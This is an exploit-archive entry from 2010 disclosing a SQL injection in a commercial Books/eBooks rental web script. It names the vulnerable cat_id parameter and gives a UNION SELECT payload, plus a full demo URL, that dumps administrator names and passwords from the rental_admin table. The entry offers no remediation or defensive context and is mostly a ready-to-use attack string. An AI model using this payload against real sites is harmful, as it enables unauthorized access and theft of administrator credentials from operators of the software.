Books/eBooks Rental Software SQL injection Vulnerability

2010-02-11T00:00:00
ID 1337DAY-ID-10832
Type zdt
Reporter Don Tukulesto
Modified 2010-02-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
========================================================
Books/eBooks Rental Software SQL injection Vulnerability
========================================================

/**************************************************************************
 
[!] Books/eBooks Rental Software SQL injection Vulnerability
[!] Author  : Don Tukulesto 
 
**************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.commodityrentals.com/
[+] This script is specifically tailored for people wanting to start a Books/E-Books Rentals Business within a very short time.
    Fully E-Commerce ready, this system comes with a Books attribute template and a fully customizable "look and feel" template of the site.
[+] Method : SQL Injection
[+] Dork : Don Tukulesto
 
===========================================================================
 
[ Proof of Concept ]
 
http://server/index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
 
[ EXPL0!T ]
 
2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
 
[ D3M0 ]
 
http://server/index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
 
===========================================================================


